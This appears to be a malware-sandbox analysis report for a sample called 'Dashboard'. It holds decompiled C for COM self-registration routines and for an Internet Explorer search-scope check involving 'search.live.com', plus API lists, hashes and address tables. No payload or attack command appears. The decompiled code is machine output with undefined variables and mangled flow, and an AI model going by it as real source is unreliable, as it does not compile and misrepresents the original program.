                                                                                                                    • Instruction Fuzzy Hash: 5A21A07090024AAFDB11DFB8C948BDE7BF8AF19301F108094E584EB295DB76DA04CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E0101015D(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, struct HINSTANCE__* _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				short _v528;
                                                                                                                    				char _v1574;
                                                                                                                    				short _v1576;
                                                                                                                    				char _v2616;
                                                                                                                    				char _v2620;
                                                                                                                    				intOrPtr _v2624;
                                                                                                                    				char _v2652;
                                                                                                                    				char _v2668;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				void* __ebp;
                                                                                                                    				signed int _t39;
                                                                                                                    				struct HINSTANCE__* _t45;
                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                    				struct HINSTANCE__* _t54;
                                                                                                                    				struct HINSTANCE__* _t57;
                                                                                                                    				char* _t58;
                                                                                                                    				struct HINSTANCE__* _t63;
                                                                                                                    				struct HINSTANCE__* _t72;
                                                                                                                    				struct HINSTANCE__* _t76;
                                                                                                                    				void* _t88;
                                                                                                                    				struct HINSTANCE__* _t89;
                                                                                                                    				struct HINSTANCE__* _t90;
                                                                                                                    				signed int _t92;
                                                                                                                    				void* _t93;
                                                                                                                    
                                                                                                                    				_t93 = __eflags;
                                                                                                                    				_t39 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t39 ^ _t92;
                                                                                                                    				_t90 = _a16;
                                                                                                                    				_t89 = _a4;
                                                                                                                    				_v2624 = _a8;
                                                                                                                    				E0100F961( &_v2668);
                                                                                                                    				_t76 = E010047E6( &_v2652, _t93);
                                                                                                                    				if(_t76 >= 0) {
                                                                                                                    					__eflags = _t90;
                                                                                                                    					if(_t90 == 0) {
                                                                                                                    						L7:
                                                                                                                    						_t45 =  *((intOrPtr*)(_t89->i + 0x14))( &_v2668);
                                                                                                                    						_t76 = 0;
                                                                                                                    						__eflags = _t45;
                                                                                                                    						if(_t45 >= 0) {
                                                                                                                    							 *0x101a294();
                                                                                                                    							_t89 =  *0x101a580; // 0x0
                                                                                                                    							_v2620 = 0;
                                                                                                                    							_t48 = GetModuleFileNameW(_t89,  &_v528, 0x104);
                                                                                                                    							__eflags = _t48;
                                                                                                                    							if(_t48 != 0) {
                                                                                                                    								__eflags = _t48 - 0x104;
                                                                                                                    								if(_t48 != 0x104) {
                                                                                                                    									E0100E036( &_v2616, 0x208,  &_v528);
                                                                                                                    									__eflags = _t89;
                                                                                                                    									if(_t89 == 0) {
                                                                                                                    										L19:
                                                                                                                    										_v1576 = 0x22;
                                                                                                                    										_t54 = E0100DF17( &_v1574, 0x20b,  &_v2616);
                                                                                                                    										__eflags = _t54;
                                                                                                                    										if(_t54 != 0) {
                                                                                                                    											_t57 = lstrlenW( &_v1576) + _t56;
                                                                                                                    											__eflags = _t57;
                                                                                                                    											 *((short*)(_t92 + _t57 - 0x624)) = 0x22;
                                                                                                                    											 *(_t92 + _t57 - 0x622) = _t76;
                                                                                                                    											_t58 =  &_v1576;
                                                                                                                    											L22:
                                                                                                                    											_push(_t58);
                                                                                                                    											_push(L"Module");
                                                                                                                    											_push( &_v2668);
                                                                                                                    											_t90 = E0100F025(_t76, _t89, 0x104, __eflags);
                                                                                                                    											__eflags = _t90 - _t76;
                                                                                                                    											if(__eflags < 0) {
                                                                                                                    												L13:
                                                                                                                    												E0100E587(_t60,  &_v2620);
                                                                                                                    												L9:
                                                                                                                    												E0100E9AF( &_v2668);
                                                                                                                    												_t63 = _t90;
                                                                                                                    												L2:
                                                                                                                    												return E010087FB(_t63, _t76, _v8 ^ _t92, _t88, _t89, _t90);
                                                                                                                    											}
                                                                                                                    											_push( &_v2616);
                                                                                                                    											_push(L"Module_Raw");
                                                                                                                    											_push( &_v2668);
                                                                                                                    											_t90 = E0100F025(_t76, _t89, _t90, __eflags);
                                                                                                                    											__eflags = _t90 - _t76;
                                                                                                                    											if(_t90 < _t76) {
                                                                                                                    												goto L13;
                                                                                                                    											}
                                                                                                                    											__eflags = _a12 - _t76;
                                                                                                                    											_push(L"REGISTRY");
                                                                                                                    											_push(_v2624);
                                                                                                                    											_push( &_v528);
                                                                                                                    											_push( &_v2668);
                                                                                                                    											if(__eflags == 0) {
                                                                                                                    												_t60 = E010100FF(_t76, _t88, _t89, _t90, __eflags);
                                                                                                                    											} else {
                                                                                                                    												_t60 = E01010059(_t76, _t88, _t89, _t90, __eflags);
                                                                                                                    											}
                                                                                                                    											L12:
                                                                                                                    											_t90 = _t60;
                                                                                                                    											goto L13;
                                                                                                                    										}
                                                                                                                    										E0100E587(_t54,  &_v2620);
                                                                                                                    										_t90 = 0x80004005;
                                                                                                                    										goto L9;
                                                                                                                    									}
                                                                                                                    									__eflags = _t89 - GetModuleHandleW(0);
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										goto L19;
                                                                                                                    									}
                                                                                                                    									_t58 =  &_v2616;
                                                                                                                    									goto L22;
                                                                                                                    								}
                                                                                                                    								E0100E587(_t48,  &_v2620);
                                                                                                                    								_t90 = 0x8007007a;
                                                                                                                    								goto L9;
                                                                                                                    							}
                                                                                                                    							_t60 = E0100CC3F();
                                                                                                                    							goto L12;
                                                                                                                    						}
                                                                                                                    						_t90 = _t45;
                                                                                                                    						goto L9;
                                                                                                                    					}
                                                                                                                    					while(1) {
                                                                                                                    						_t72 = _t90->i;
                                                                                                                    						__eflags = _t72;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							goto L7;
                                                                                                                    						}
                                                                                                                    						_push( *((intOrPtr*)(_t90 + 4)));
                                                                                                                    						_push(_t72);
                                                                                                                    						_push( &_v2668);
                                                                                                                    						E0100F025(_t76, _t89, _t90, __eflags);
                                                                                                                    						_t90 = _t90 + 8;
                                                                                                                    						__eflags = _t90;
                                                                                                                    					}
                                                                                                                    					goto L7;
                                                                                                                    				}
                                                                                                                    				E0100E9AF( &_v2668);
                                                                                                                    				_t63 = _t76;
                                                                                                                    				goto L2;
                                                                                                                    			}






























                                                                                                                    0x0101015d
                                                                                                                    0x01010168
                                                                                                                    0x0101016f
                                                                                                                    0x01010177
                                                                                                                    0x0101017b
                                                                                                                    0x01010184
                                                                                                                    0x0101018a
                                                                                                                    0x0101019a
                                                                                                                    0x0101019e
                                                                                                                    0x010101be
                                                                                                                    0x010101c0
                                                                                                                    0x010101dd
                                                                                                                    0x010101e8
                                                                                                                    0x010101eb
                                                                                                                    0x010101ed
                                                                                                                    0x010101ef
                                                                                                                    0x01010202
                                                                                                                    0x01010208
                                                                                                                    0x0101021c
                                                                                                                    0x01010222
                                                                                                                    0x01010228
                                                                                                                    0x0101022a
                                                                                                                    0x01010240
                                                                                                                    0x01010242
                                                                                                                    0x01010269
                                                                                                                    0x0101026e
                                                                                                                    0x01010270
                                                                                                                    0x01010285
                                                                                                                    0x01010298
                                                                                                                    0x010102a1
                                                                                                                    0x010102a6
                                                                                                                    0x010102a8
                                                                                                                    0x010102cc
                                                                                                                    0x010102cc
                                                                                                                    0x010102ce
                                                                                                                    0x010102d8
                                                                                                                    0x010102e0
                                                                                                                    0x010102e6
                                                                                                                    0x010102e6
                                                                                                                    0x010102e7
                                                                                                                    0x010102f2
                                                                                                                    0x010102f8
                                                                                                                    0x010102fa
                                                                                                                    0x010102fc
                                                                                                                    0x01010233
                                                                                                                    0x01010239
                                                                                                                    0x010101f3
                                                                                                                    0x010101f9
                                                                                                                    0x010101fe
                                                                                                                    0x010101ad
                                                                                                                    0x010101bb
                                                                                                                    0x010101bb
                                                                                                                    0x01010308
                                                                                                                    0x01010309
                                                                                                                    0x01010314
                                                                                                                    0x0101031a
                                                                                                                    0x0101031c
                                                                                                                    0x0101031e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010324
                                                                                                                    0x01010327
                                                                                                                    0x0101032c
                                                                                                                    0x01010338
                                                                                                                    0x0101033f
                                                                                                                    0x01010340
                                                                                                                    0x0101034c
                                                                                                                    0x01010342
                                                                                                                    0x01010342
                                                                                                                    0x01010342
                                                                                                                    0x01010231
                                                                                                                    0x01010231
                                                                                                                    0x00000000
                                                                                                                    0x01010231
                                                                                                                    0x010102b0
                                                                                                                    0x010102b5
                                                                                                                    0x00000000
                                                                                                                    0x010102b5
                                                                                                                    0x01010279
                                                                                                                    0x0101027b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101027d
                                                                                                                    0x00000000
                                                                                                                    0x0101027d
                                                                                                                    0x0101024a
                                                                                                                    0x0101024f
                                                                                                                    0x00000000
                                                                                                                    0x0101024f
                                                                                                                    0x0101022c
                                                                                                                    0x00000000
                                                                                                                    0x0101022c
                                                                                                                    0x010101f1
                                                                                                                    0x00000000
                                                                                                                    0x010101f1
                                                                                                                    0x010101d7
                                                                                                                    0x010101d7
                                                                                                                    0x010101d9
                                                                                                                    0x010101db
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010101c4
                                                                                                                    0x010101c7
                                                                                                                    0x010101ce
                                                                                                                    0x010101cf
                                                                                                                    0x010101d4
                                                                                                                    0x010101d4
                                                                                                                    0x010101d4
                                                                                                                    0x00000000
                                                                                                                    0x010101d7
                                                                                                                    0x010101a6
                                                                                                                    0x010101ab
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0100E9AF: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0100EA1A), ref: 0100E9CE
                                                                                                                      • Part of subcall function 0100F025: __EH_prolog3.LIBCMT ref: 0100F02C
                                                                                                                      • Part of subcall function 0100F025: EnterCriticalSection.KERNEL32(00000000,00000000,010102F8,?,Module,00000022), ref: 0100F044
                                                                                                                      • Part of subcall function 0100F025: LeaveCriticalSection.KERNEL32(00000000,00000000,00000000), ref: 0100F069
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01010222
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01010273
                                                                                                                      • Part of subcall function 0100DF17: lstrlenW.KERNEL32(?), ref: 0100DF1F
                                                                                                                      • Part of subcall function 0100DF17: memcpy_s.MSVCR80 ref: 0100DF36
                                                                                                                    • lstrlenW.KERNEL32(00000022), ref: 010102C6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Modulelstrlen$DeleteEnterFileH_prolog3HandleLeaveNamememcpy_s
                                                                                                                    • String ID: "$Module$Module_Raw$REGISTRY
                                                                                                                    • API String ID: 332685461-3881418485
                                                                                                                    • Opcode ID: c351b8aa09a13ca807f1a00a270b5964c2643aec74d88fdae1cdfc293cc3a101
                                                                                                                    • Instruction ID: d46999cc658952edaea7454df8a5fe132568ef7091b98177f4d0ba10c9127f31
                                                                                                                    • Opcode Fuzzy Hash: c351b8aa09a13ca807f1a00a270b5964c2643aec74d88fdae1cdfc293cc3a101
                                                                                                                    • Instruction Fuzzy Hash: 27515271A0022A9BDB61EBA4CC84AED73B8AF59200F4405E5F5C5E7149EA3D9FC4CF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E0101035B(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, struct HINSTANCE__* _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				short _v528;
                                                                                                                    				char _v1574;
                                                                                                                    				short _v1576;
                                                                                                                    				char _v2616;
                                                                                                                    				char _v2620;
                                                                                                                    				char _v2648;
                                                                                                                    				char _v2664;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				void* __ebp;
                                                                                                                    				signed int _t37;
                                                                                                                    				struct HINSTANCE__* _t42;
                                                                                                                    				struct HINSTANCE__* _t45;
                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                    				struct HINSTANCE__* _t54;
                                                                                                                    				char* _t55;
                                                                                                                    				struct HINSTANCE__* _t60;
                                                                                                                    				struct HINSTANCE__* _t69;
                                                                                                                    				struct HINSTANCE__* _t73;
                                                                                                                    				void* _t85;
                                                                                                                    				struct HINSTANCE__* _t86;
                                                                                                                    				struct HINSTANCE__* _t87;
                                                                                                                    				signed int _t89;
                                                                                                                    				void* _t90;
                                                                                                                    
                                                                                                                    				_t90 = __eflags;
                                                                                                                    				_t37 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t37 ^ _t89;
                                                                                                                    				_t87 = _a16;
                                                                                                                    				_t86 = _a4;
                                                                                                                    				E0100F961( &_v2664);
                                                                                                                    				_t73 = E010047E6( &_v2648, _t90);
                                                                                                                    				if(_t73 >= 0) {
                                                                                                                    					__eflags = _t87;
                                                                                                                    					if(_t87 == 0) {
                                                                                                                    						L7:
                                                                                                                    						_t42 =  *((intOrPtr*)(_t86->i + 0x14))( &_v2664);
                                                                                                                    						_t73 = 0;
                                                                                                                    						__eflags = _t42;
                                                                                                                    						if(_t42 >= 0) {
                                                                                                                    							 *0x101a294();
                                                                                                                    							_t86 =  *0x101a580; // 0x0
                                                                                                                    							_v2620 = 0;
                                                                                                                    							_t45 = GetModuleFileNameW(_t86,  &_v528, 0x104);
                                                                                                                    							__eflags = _t45;
                                                                                                                    							if(_t45 != 0) {
                                                                                                                    								__eflags = _t45 - 0x104;
                                                                                                                    								if(_t45 != 0x104) {
                                                                                                                    									E0100E036( &_v2616, 0x208,  &_v528);
                                                                                                                    									__eflags = _t86;
                                                                                                                    									if(_t86 == 0) {
                                                                                                                    										L19:
                                                                                                                    										_v1576 = 0x22;
                                                                                                                    										_t51 = E0100DF17( &_v1574, 0x20b,  &_v2616);
                                                                                                                    										__eflags = _t51;
                                                                                                                    										if(_t51 != 0) {
                                                                                                                    											_t54 = lstrlenW( &_v1576) + _t53;
                                                                                                                    											__eflags = _t54;
                                                                                                                    											 *((short*)(_t89 + _t54 - 0x624)) = 0x22;
                                                                                                                    											 *(_t89 + _t54 - 0x622) = _t73;
                                                                                                                    											_t55 =  &_v1576;
                                                                                                                    											L22:
                                                                                                                    											_push(_t55);
                                                                                                                    											_push(L"Module");
                                                                                                                    											_push( &_v2664);
                                                                                                                    											_t87 = E0100F025(_t73, _t86, 0x104, __eflags);
                                                                                                                    											__eflags = _t87 - _t73;
                                                                                                                    											if(__eflags < 0) {
                                                                                                                    												L13:
                                                                                                                    												E0100E587(_t57,  &_v2620);
                                                                                                                    												L9:
                                                                                                                    												E0100E9AF( &_v2664);
                                                                                                                    												_t60 = _t87;
                                                                                                                    												L2:
                                                                                                                    												return E010087FB(_t60, _t73, _v8 ^ _t89, _t85, _t86, _t87);
                                                                                                                    											}
                                                                                                                    											_push( &_v2616);
                                                                                                                    											_push(L"Module_Raw");
                                                                                                                    											_push( &_v2664);
                                                                                                                    											_t87 = E0100F025(_t73, _t86, _t87, __eflags);
                                                                                                                    											__eflags = _t87 - _t73;
                                                                                                                    											if(_t87 < _t73) {
                                                                                                                    												goto L13;
                                                                                                                    											}
                                                                                                                    											__eflags = _a12 - _t73;
                                                                                                                    											_push(L"REGISTRY");
                                                                                                                    											_push(_a8);
                                                                                                                    											_push( &_v528);
                                                                                                                    											_push( &_v2664);
                                                                                                                    											if(__eflags == 0) {
                                                                                                                    												_t57 = E010100B8(_t73, _t85, _t86, _t87, __eflags);
                                                                                                                    											} else {
                                                                                                                    												_t57 = E01010011(_t73, _t85, _t86, _t87, __eflags);
                                                                                                                    											}
                                                                                                                    											L12:
                                                                                                                    											_t87 = _t57;
                                                                                                                    											goto L13;
                                                                                                                    										}
                                                                                                                    										E0100E587(_t51,  &_v2620);
                                                                                                                    										_t87 = 0x80004005;
                                                                                                                    										goto L9;
                                                                                                                    									}
                                                                                                                    									__eflags = _t86 - GetModuleHandleW(0);
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										goto L19;
                                                                                                                    									}
                                                                                                                    									_t55 =  &_v2616;
                                                                                                                    									goto L22;
                                                                                                                    								}
                                                                                                                    								E0100E587(_t45,  &_v2620);
                                                                                                                    								_t87 = 0x8007007a;
                                                                                                                    								goto L9;
                                                                                                                    							}
                                                                                                                    							_t57 = E0100CC3F();
                                                                                                                    							goto L12;
                                                                                                                    						}
                                                                                                                    						_t87 = _t42;
                                                                                                                    						goto L9;
                                                                                                                    					}
                                                                                                                    					while(1) {
                                                                                                                    						_t69 = _t87->i;
                                                                                                                    						__eflags = _t69;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							goto L7;
                                                                                                                    						}
                                                                                                                    						_push( *((intOrPtr*)(_t87 + 4)));
                                                                                                                    						_push(_t69);
                                                                                                                    						_push( &_v2664);
                                                                                                                    						E0100F025(_t73, _t86, _t87, __eflags);
                                                                                                                    						_t87 = _t87 + 8;
                                                                                                                    						__eflags = _t87;
                                                                                                                    					}
                                                                                                                    					goto L7;
                                                                                                                    				}
                                                                                                                    				E0100E9AF( &_v2664);
                                                                                                                    				_t60 = _t73;
                                                                                                                    				goto L2;
                                                                                                                    			}





























                                                                                                                    0x0101035b
                                                                                                                    0x01010366
                                                                                                                    0x0101036d
                                                                                                                    0x01010372
                                                                                                                    0x01010376
                                                                                                                    0x0101037f
                                                                                                                    0x0101038f
                                                                                                                    0x01010393
                                                                                                                    0x010103b3
                                                                                                                    0x010103b5
                                                                                                                    0x010103d2
                                                                                                                    0x010103dd
                                                                                                                    0x010103e0
                                                                                                                    0x010103e2
                                                                                                                    0x010103e4
                                                                                                                    0x010103f7
                                                                                                                    0x010103fd
                                                                                                                    0x01010411
                                                                                                                    0x01010417
                                                                                                                    0x0101041d
                                                                                                                    0x0101041f
                                                                                                                    0x01010435
                                                                                                                    0x01010437
                                                                                                                    0x0101045e
                                                                                                                    0x01010463
                                                                                                                    0x01010465
                                                                                                                    0x0101047a
                                                                                                                    0x0101048d
                                                                                                                    0x01010496
                                                                                                                    0x0101049b
                                                                                                                    0x0101049d
                                                                                                                    0x010104c1
                                                                                                                    0x010104c1
                                                                                                                    0x010104c3
                                                                                                                    0x010104cd
                                                                                                                    0x010104d5
                                                                                                                    0x010104db
                                                                                                                    0x010104db
                                                                                                                    0x010104dc
                                                                                                                    0x010104e7
                                                                                                                    0x010104ed
                                                                                                                    0x010104ef
                                                                                                                    0x010104f1
                                                                                                                    0x01010428
                                                                                                                    0x0101042e
                                                                                                                    0x010103e8
                                                                                                                    0x010103ee
                                                                                                                    0x010103f3
                                                                                                                    0x010103a2
                                                                                                                    0x010103b0
                                                                                                                    0x010103b0
                                                                                                                    0x010104fd
                                                                                                                    0x010104fe
                                                                                                                    0x01010509
                                                                                                                    0x0101050f
                                                                                                                    0x01010511
                                                                                                                    0x01010513
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010519
                                                                                                                    0x0101051c
                                                                                                                    0x01010521
                                                                                                                    0x0101052a
                                                                                                                    0x01010531
                                                                                                                    0x01010532
                                                                                                                    0x0101053e
                                                                                                                    0x01010534
                                                                                                                    0x01010534
                                                                                                                    0x01010534
                                                                                                                    0x01010426
                                                                                                                    0x01010426
                                                                                                                    0x00000000
                                                                                                                    0x01010426
                                                                                                                    0x010104a5
                                                                                                                    0x010104aa
                                                                                                                    0x00000000
                                                                                                                    0x010104aa
                                                                                                                    0x0101046e
                                                                                                                    0x01010470
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010472
                                                                                                                    0x00000000
                                                                                                                    0x01010472
                                                                                                                    0x0101043f
                                                                                                                    0x01010444
                                                                                                                    0x00000000
                                                                                                                    0x01010444
                                                                                                                    0x01010421
                                                                                                                    0x00000000
                                                                                                                    0x01010421
                                                                                                                    0x010103e6
                                                                                                                    0x00000000
                                                                                                                    0x010103e6
                                                                                                                    0x010103cc
                                                                                                                    0x010103cc
                                                                                                                    0x010103ce
                                                                                                                    0x010103d0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010103b9
                                                                                                                    0x010103bc
                                                                                                                    0x010103c3
                                                                                                                    0x010103c4
                                                                                                                    0x010103c9
                                                                                                                    0x010103c9
                                                                                                                    0x010103c9
                                                                                                                    0x00000000
                                                                                                                    0x010103cc
                                                                                                                    0x0101039b
                                                                                                                    0x010103a0
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0100E9AF: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0100EA1A), ref: 0100E9CE
                                                                                                                      • Part of subcall function 0100F025: __EH_prolog3.LIBCMT ref: 0100F02C
                                                                                                                      • Part of subcall function 0100F025: EnterCriticalSection.KERNEL32(00000000,00000000,010102F8,?,Module,00000022), ref: 0100F044
                                                                                                                      • Part of subcall function 0100F025: LeaveCriticalSection.KERNEL32(00000000,00000000,00000000), ref: 0100F069
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01010417
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01010468
                                                                                                                      • Part of subcall function 0100DF17: lstrlenW.KERNEL32(?), ref: 0100DF1F
                                                                                                                      • Part of subcall function 0100DF17: memcpy_s.MSVCR80 ref: 0100DF36
                                                                                                                    • lstrlenW.KERNEL32(00000022), ref: 010104BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Modulelstrlen$DeleteEnterFileH_prolog3HandleLeaveNamememcpy_s
                                                                                                                    • String ID: "$Module$Module_Raw$REGISTRY
                                                                                                                    • API String ID: 332685461-3881418485
                                                                                                                    • Opcode ID: cfa358debf78099171d65b9fc63a9b4aa20d5087ae44e40a0c9ddf0a0767442a
                                                                                                                    • Instruction ID: a6aad74a2c5b9154bc058d32289d94a35c7a930bb73b25fd90c9e60d46a93487
                                                                                                                    • Opcode Fuzzy Hash: cfa358debf78099171d65b9fc63a9b4aa20d5087ae44e40a0c9ddf0a0767442a
                                                                                                                    • Instruction Fuzzy Hash: AD519471A0032A9BDB21EBA4DD849EE73BCAF58300F4405A5F5C5E7149DB399F84CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E01010CBA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t48;
                                                                                                                    				signed int _t69;
                                                                                                                    				void* _t95;
                                                                                                                    				signed int _t99;
                                                                                                                    				void* _t103;
                                                                                                                    
                                                                                                                    				_t95 = __edx;
                                                                                                                    				_push(0x24);
                                                                                                                    				E0100880F(E0101630C, __ebx, __edi, __esi);
                                                                                                                    				_t71 = 0;
                                                                                                                    				 *((intOrPtr*)(_t103 - 0x20)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
                                                                                                                    				 *((char*)(_t103 - 4)) = 1;
                                                                                                                    				E01004D33(_t103 - 0x18, 0x101a5f0);
                                                                                                                    				 *((char*)(_t103 - 4)) = 2;
                                                                                                                    				E01004D33(_t103 - 0x14, 0x101a5f0);
                                                                                                                    				 *((char*)(_t103 - 4)) = 3;
                                                                                                                    				E01004D33(_t103 - 0x10, 0x101a5f0);
                                                                                                                    				 *((char*)(_t103 - 4)) = 4;
                                                                                                                    				 *((short*)(_t103 - 0x30)) = 0;
                                                                                                                    				 *((short*)(_t103 - 0x2e)) = 0;
                                                                                                                    				 *((short*)(_t103 - 0x2c)) = 0;
                                                                                                                    				 *((short*)(_t103 - 0x2a)) = 0;
                                                                                                                    				_t48 = E0100C55B(_t103 - 0x1c, 0x80000002, L"Software\\Microsoft\\Internet Explorer", 0, 0, 0x2001f, 0, 0);
                                                                                                                    				_t105 = _t48;
                                                                                                                    				if(_t48 != 0) {
                                                                                                                    					L12:
                                                                                                                    					E01004925( *((intOrPtr*)(_t103 - 0x10)) + 0xfffffff0, _t95);
                                                                                                                    					E01004925( *((intOrPtr*)(_t103 - 0x14)) + 0xfffffff0, _t95);
                                                                                                                    					E01004925( *((intOrPtr*)(_t103 - 0x18)) + 0xfffffff0, _t95);
                                                                                                                    					E0100C53D(_t103 - 0x1c);
                                                                                                                    					E0100C53D(_t103 - 0x20);
                                                                                                                    					return E010088FB(_t71);
                                                                                                                    				}
                                                                                                                    				_push(L"Version");
                                                                                                                    				E0100653B(0, _t103 - 0x24, 0x2001f, 0, _t105);
                                                                                                                    				 *((char*)(_t103 - 4)) = 5;
                                                                                                                    				 *((intOrPtr*)(_t103 - 0x28)) = E010106BB( *((intOrPtr*)(_t103 - 0x1c)), _t103 - 0x24, _t103 - 0x10);
                                                                                                                    				 *((char*)(_t103 - 4)) = 4;
                                                                                                                    				E01004925( *((intOrPtr*)(_t103 - 0x24)) + 0xfffffff0, _t95);
                                                                                                                    				if( *((intOrPtr*)(_t103 - 0x28)) != 0) {
                                                                                                                    					goto L12;
                                                                                                                    				}
                                                                                                                    				E0100CB8C(_t103 - 0x30,  *((intOrPtr*)(_t103 - 0x10)), 2);
                                                                                                                    				if( *((short*)(_t103 - 0x30)) == 7) {
                                                                                                                    					_push(_t103 - 0x18);
                                                                                                                    					_push(L"search.live.com");
                                                                                                                    					_t71 = E010109AF(0, _t95, 0x2001f, 0, __eflags);
                                                                                                                    					__eflags = _t71;
                                                                                                                    					if(_t71 != 0) {
                                                                                                                    						goto L12;
                                                                                                                    					}
                                                                                                                    					_t99 = E0100C55B(_t103 - 0x20, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\SearchScopes", 0, 0, 0x2001f, 0, 0);
                                                                                                                    					__eflags = _t99;
                                                                                                                    					if(__eflags != 0) {
                                                                                                                    						L9:
                                                                                                                    						if(__eflags > 0) {
                                                                                                                    							_t99 = _t99 & 0x0000ffff | 0x80070000;
                                                                                                                    							__eflags = _t99;
                                                                                                                    						}
                                                                                                                    						_t71 = _t99;
                                                                                                                    						goto L12;
                                                                                                                    					}
                                                                                                                    					_push(L"DefaultScope");
                                                                                                                    					E0100653B(_t71, _t103 - 0x24, _t99, 0, __eflags);
                                                                                                                    					 *((char*)(_t103 - 4)) = 6;
                                                                                                                    					_t99 = E010106BB( *((intOrPtr*)(_t103 - 0x20)), _t103 - 0x24, _t103 - 0x14);
                                                                                                                    					_t69 = E01004925( *((intOrPtr*)(_t103 - 0x24)) + 0xfffffff0, _t95);
                                                                                                                    					__eflags = _t99;
                                                                                                                    					if(__eflags != 0) {
                                                                                                                    						goto L9;
                                                                                                                    					}
                                                                                                                    					__imp___wcsicmp( *((intOrPtr*)(_t103 - 0x18)),  *((intOrPtr*)(_t103 - 0x14)));
                                                                                                                    					__eflags = _t69;
                                                                                                                    					if(_t69 != 0) {
                                                                                                                    						_t71 = 1;
                                                                                                                    					}
                                                                                                                    					goto L12;
                                                                                                                    				}
                                                                                                                    				_t71 = 0x80004005;
                                                                                                                    				goto L12;
                                                                                                                    			}








                                                                                                                    0x01010cba
                                                                                                                    0x01010cba
                                                                                                                    0x01010cc1
                                                                                                                    0x01010cc8
                                                                                                                    0x01010cca
                                                                                                                    0x01010ccd
                                                                                                                    0x01010cd0
                                                                                                                    0x01010cdc
                                                                                                                    0x01010ce0
                                                                                                                    0x01010ce9
                                                                                                                    0x01010ced
                                                                                                                    0x01010cf6
                                                                                                                    0x01010cfa
                                                                                                                    0x01010d16
                                                                                                                    0x01010d1a
                                                                                                                    0x01010d1e
                                                                                                                    0x01010d22
                                                                                                                    0x01010d26
                                                                                                                    0x01010d2a
                                                                                                                    0x01010d2f
                                                                                                                    0x01010d31
                                                                                                                    0x01010e1b
                                                                                                                    0x01010e21
                                                                                                                    0x01010e2c
                                                                                                                    0x01010e37
                                                                                                                    0x01010e3f
                                                                                                                    0x01010e47
                                                                                                                    0x01010e53
                                                                                                                    0x01010e53
                                                                                                                    0x01010d37
                                                                                                                    0x01010d3f
                                                                                                                    0x01010d4f
                                                                                                                    0x01010d5e
                                                                                                                    0x01010d61
                                                                                                                    0x01010d65
                                                                                                                    0x01010d6d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010d7b
                                                                                                                    0x01010d85
                                                                                                                    0x01010d94
                                                                                                                    0x01010d95
                                                                                                                    0x01010d9f
                                                                                                                    0x01010da1
